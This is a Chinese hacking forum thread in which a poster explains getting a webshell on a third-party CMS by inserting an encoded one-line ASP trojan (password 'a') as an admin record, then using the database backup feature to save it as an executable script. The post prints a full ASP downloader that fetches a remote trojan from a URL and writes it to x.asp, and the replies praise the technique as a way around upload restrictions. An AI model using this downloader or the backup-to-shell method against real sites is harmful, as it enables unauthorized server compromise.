后台插入一句话备份连接之
作者:冰刀博客:www.bingdao2b.com
本来这个事情用标题的一句话就能表达清楚的
但几个朋友希望图文并茂 就记录下吧
以此来缓解下8天之痛….
—————-action———————————–
一个朋友扔了个地址过来说是
有智创 上传突破不了
我也就没怎么管他 就扔了个
<%
Set xPost = CreateObject(“Microsoft.XMLHTTP”)
xPost.Open “GET”,”http://www.baidu.com/2.txt”,False
xPost.Send()
Set sGet = CreateObject(“ADODB.Stream”)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath(“x.asp”),2
set sGet = nothing
set sPOST = nothing
%>
保存为 x.asp
http://www.baidu.com/2.txt 这里为你的马 或者一句话
x.asp 为下载后的名字 这个可以是PHP aspx 等等
但他利用后没有成功
就叫我看看
网站有点卡 不过这个很眼熟呀…>w<
对可能是南方数据良精 的源码…
发现可以备份
备份了下后发现能看到全屏乱码说明备份成功的
但是大家觉得当前数据库路径改不了 就没啥办法
但是我们可以添加管理员(管理员 的数据也会被备份的。)
那个乱码的管理员就是我插的
┼攠數畣整爠煥敵瑳∨≡┩愾 //密码是a 插数据库专用一句话。
备份连接之
成功 提权什么的就不做了太卡了。。。
这个思路没什么 大家会的就飞过
不会的就记住吧…下次可以利用哦
我问问
<%
Set xPost = CreateObject(“Microsoft.XMLHTTP”)
xPost.Open “GET”,”http://www.baidu.com/2.txt”,False
xPost.Send()
Set sGet = CreateObject(“ADODB.Stream”)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath(“x.asp”),2
set sGet = nothing
set sPOST = nothing
%>这个具体是怎么利用的啊!能不能教教我 大侠 支持下、、 大侠、、、 635634436 发表于 2013-1-12 11:55 static/image/common/back.gif
我问问
这个具体是怎么利用的啊!能不能教教我 大侠
{:3_41:}这是个下载脚本 备份后是asp 能不能直接在他留言板什么的写一句话 然后备份连接
Re: 后台插入一句话备份连接之
这个思路挺实用的,特别是遇到那种上传功能被限制、但后台数据库备份能正常操作的情况。通过先往数据库里插一句话,再利用备份功能导出成可执行脚本,算是一种绕过的经典手法。感谢分享,对新手来说多了一种思路储备。Re: 后台插入一句话备份连接之
这个思路确实挺实用的,很多CMS后台虽然限制了上传,但数据库备份功能往往没怎么设防。利用插入一句话木马到数据库,再通过备份改后缀的方式写shell,算是钻了备份机制的空子。楼主把这个过程讲得很清楚,图文并茂对新手帮助很大,感谢分享!Re: 后台插入一句话备份连接之
看了你的文章,这个思路很有启发性!利用数据库备份功能来让一句话木马生效,确实能绕过很多上传限制。对于新手来说,知道“插入一句话进数据库→备份成脚本文件”这个流程,以后遇到类似情况就有办法了。感谢分享实战经验!
页:
[1]